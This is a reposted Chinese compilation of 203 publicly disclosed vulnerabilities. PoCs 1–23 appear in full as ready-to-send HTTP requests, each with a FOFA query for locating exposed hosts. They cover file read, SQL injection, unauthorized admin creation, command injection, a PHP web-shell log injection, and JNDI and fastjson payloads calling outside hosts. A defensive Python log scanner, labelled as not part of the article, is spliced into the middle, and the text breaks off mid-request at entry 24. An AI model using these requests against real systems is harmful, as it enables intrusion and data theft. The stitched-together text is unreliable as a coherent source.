Compilation of publicly disclosed internet vulnerabilities 202309-202406 (repost)

Posted on 2024-6-5 14:31:29
Compilation of publicly disclosed internet vulnerabilities 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is sourced from 网络安全新视界; author: 网络安全新视界

Purpose: exploitation of N-day vulnerabilities accounts for a large share of attacks in offensive/defensive exercises, and we hope this article helps defenders. Defensive teams can use its contents to check their own exposure.

Vulnerability sources: the article covers 203 PoCs for high-severity vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024. All come from other public accounts or websites on the internet and were collected and published by the 网络安全新视界 team.

Security patches: all of the vulnerabilities are public; for patches or remediation guidance, contact the product vendor.

Article content: owing to length limits, a few overly long PoCs are replaced by the word PAYLOAD; search for the full PoC yourself if you need it.

Legal rights: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the back end to have it removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list". This article is the most complete version; when using it, press F12 and search for keywords.

Bookmark this article if you need it. You can also follow the public account (网络安全新视界).

Contents

01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 (Sangfor) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌 (Landray) EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌 (Landray) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. 大华 (Dahua) DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华 ICC intelligent IoT integrated management platform arbitrary file read
21. 大华 ICC intelligent IoT integrated management platform random remote code execution
22. 大华 ICC intelligent IoT integrated management platform log4j remote code execution
23. 大华 ICC intelligent IoT integrated management platform fastjson remote code execution
24. 用友 (Yonyou) NC 6.5 accept.jsp arbitrary file upload
25. 用友 NC registerServlet JNDI remote code execution
26. 用友 NC linkVoucher SQL injection
27. 用友 NC showcontent SQL injection
28. 用友 NC grouptemplet arbitrary file upload
29. 用友 NC down/bill SQL injection
30. 用友 NC importPml SQL injection
31. 用友 NC runStateServlet SQL injection
32. 用友 NC complainbilldetail SQL injection
33. 用友 NC downTax/download SQL injection
34. 用友 NC warningDetailInfo interface SQL injection
35. 用友 NC-Cloud importhttpscer arbitrary file upload
36. 用友 NC-Cloud soapFormat XXE
37. 用友 NC-Cloud IUpdateService XXE
38. 用友 U8 Cloud smartweb2.RPC.d XXE
39. 用友 U8 Cloud RegisterServlet SQL injection
40. 用友 U8-Cloud XChangeServlet XXE
41. 用友 U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友 GRP-U8 SmartUpload01 file upload
43. 用友 GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友 GRP-U8 bx_dj_check.jsp SQL injection
45. 用友 GRP-U8 ufgovbank XXE
46. 用友 GRP-U8 sqcxIndex.jsp SQL injection
47. 用友 GRP A++Cloud government finance cloud arbitrary file read
48. 用友 U8 CRM swfupload arbitrary file upload
49. 用友 U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. 泛微 (Weaver) E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通 (Chanjet) T+ getstorewarehousebystore remote code execution
55. 畅捷通 T+ getdecallusers information disclosure
56. 畅捷通 T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通 T+ keyEdit.aspx SQL injection
58. 畅捷通 T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 privilege bypass
66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远 (Seeyon) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远 M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 traffic-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. tosei (Japan) self-service laundry machine RCE
87. 安恒 明御 security gateway aaa_local_web_preview file upload
88. 安恒 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联 FE collaborative office platform editflow_manager SQL injection
90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management center session command execution
93. 奇安信 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. 广联达 Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 云商城 file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass and template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical browsing system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科 (Hillstone) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 (Aliyun Drive) WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS 海洋影视 management system dmku SQL injection
201. 方正 omnimedia news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

PoC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Change password to the MD5 of your own password
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. 深信服 (Sangfor) NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging into the backend with the default admin account, perform the following operation
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the step-one login>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=…
Host: x.x.x.x

The payload is the double URL-encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌 (Landray) EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. 蓝凌 (Landray) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step one: obtain the cookies
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request: the function written in executes commands supplied in base64 encoding
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPassword

Send the following request to the lab target to execute the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command string
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
Leaked data includes usernames and passwords
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
Leaked data includes usernames and passwords
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The PoC calls a function that computes the MD5 of 1234
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. 大华 (Dahua) DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. 大华 DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. 大华 ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. 大华 ICC intelligent IoT integrated management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. 大华 ICC intelligent IoT integrated management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. 大华 ICC intelligent IoT integrated management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

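The entries above reuse a small set of request-level indicators: traversal sequences (2, 6, 13, 20), error-based SQL functions and time delays (9, 11, 16, 17, 19), Spring path-matching tricks such as `;.ico` and `a.ico/../` (14, 15), a shell metacharacter in a query parameter (5), and fastjson or JNDI markers in JSON bodies (21, 22, 23). Since the article's stated purpose is to let defenders check their own exposure, here is an added Python example (not part of the reposted article and not any vendor's code) that a defender can run over web access logs: it percent-decodes each request twice, because entry 9's payload is double-encoded and a single decode would miss it, and tags every line that matches one of those indicator classes. The log lines, IP addresses, timestamps and request bodies in it are constructed for the example.

```python
"""Indicator scan over web access logs for the request-level patterns that recur in
the entries above. Added example for defenders; it is not part of the reposted
article, and the log lines below are constructed, not real traffic."""
import re
from urllib.parse import unquote

# Generic indicator classes, each drawn from a group of entries above
# (2/6/13/20 traversal, 9/11/16/17/19/26 SQLi, 14/15 path-matching bypass,
# 21-23/25 fastjson and JNDI, 5 command injection). Tune before use on real traffic.
RULES = [
    ("path-traversal", re.compile(r"\.\./|\.\.\\|/etc/(?:\./)?passwd|win\.ini|file:/", re.I)),
    ("sqli-error-based", re.compile(
        r"\b(?:extractvalue|updatexml|hashbytes)\s*\(|waitfor\s+delay|@@version", re.I)),
    ("jndi-lookup", re.compile(r"\$\{jndi:", re.I)),
    ("fastjson-autotype", re.compile(
        r'"@type"\s*:\s*"(?:java\.net\.URL|com\.alibaba\.fastjson)', re.I)),
    ("spring-path-bypass", re.compile(r";\.\w+\b|/[\w-]+\.ico/\.\./", re.I)),
    ("cmd-injection-param", re.compile(
        r"[?&][\w.-]+=[^&\s]*;\s*(?:whoami|id\b|cat\s)", re.I)),
]

# Combined/common log format: client, ident, user, [timestamp], "request", status, size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) ')


def normalize(text: str, rounds: int = 2) -> str:
    """Percent-decode up to `rounds` times; entry 9 uses a double-encoded payload,
    so a single decode would miss it. Stops early once decoding changes nothing."""
    decoded = text
    for _ in range(rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded


def scan_request(text: str) -> list:
    """Return the sorted rule tags that fire on a request line or body."""
    decoded = normalize(text)
    return sorted(tag for tag, rx in RULES if rx.search(decoded))


def scan_access_log(lines) -> list:
    """Return (client_ip, request, tags) for every log line that hits a rule."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        tags = scan_request(m.group("req"))
        if tags:
            hits.append((m.group("ip"), m.group("req"), tags))
    return hits


# Constructed sample log (documentation addresses, invented timestamps); the paths
# mirror entries 2, 6, 19, 14, 9 and 5 above, followed by two benign requests.
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Oct/2023:09:34:28 +0000] "GET /static/../../../../etc/passwd HTTP/1.1" 200 1204',
    '203.0.113.5 - - [24/Oct/2023:09:35:02 +0000] "GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1" 200 980',
    '203.0.113.9 - - [24/Oct/2023:09:36:10 +0000] "GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27a%27=%27a HTTP/1.1" 500 312',
    '203.0.113.9 - - [24/Oct/2023:09:36:40 +0000] "GET /jshERP-boot/user/getAllList;.ico HTTP/1.1" 200 5521',
    '203.0.113.9 - - [24/Oct/2023:09:37:01 +0000] "GET /search/index.php?keyword=%2527%2520and%2520extractvalue(1,concat(0x7e,user()))%2523 HTTP/1.1" 200 40',
    '198.51.100.7 - - [24/Oct/2023:09:38:15 +0000] "GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1" 200 55',
    '198.51.100.7 - - [24/Oct/2023:09:39:00 +0000] "GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1" 401 0',
    '198.51.100.7 - - [24/Oct/2023:09:39:30 +0000] "GET /index.html HTTP/1.1" 200 1500',
]

# Constructed request bodies in the shape of entries 22 and 23; access logs do not
# carry bodies, so these two rules need full-request captures (WAF, proxy, IDS).
SAMPLE_JNDI_BODY = '{"loginName":"${jndi:ldap://example.invalid/a"}'
SAMPLE_FASTJSON_BODY = ('{"a":{"@type":"com.alibaba.fastjson.JSONObject",'
                        '{"@type":"java.net.URL","val":"http://example.invalid"}}""}')

if __name__ == "__main__":
    for ip, req, tags in scan_access_log(SAMPLE_LOG):
        print(f"{ip:<14} {','.join(tags):<22} {req}")
    print("bodies:", scan_request(SAMPLE_JNDI_BODY), scan_request(SAMPLE_FASTJSON_BODY))
```

Run it as a script to print the tagged sample lines, or import `scan_access_log` and feed it a real log. The rules are coarse hunting heuristics, not a WAF: expect false positives from legitimate paths that contain `..` or `file:`, and remember that request bodies, where the log4j and fastjson payloads travel, are absent from an access log, so those two rules only pay off against full-request captures.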
24. 用友 (Yonyou) NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
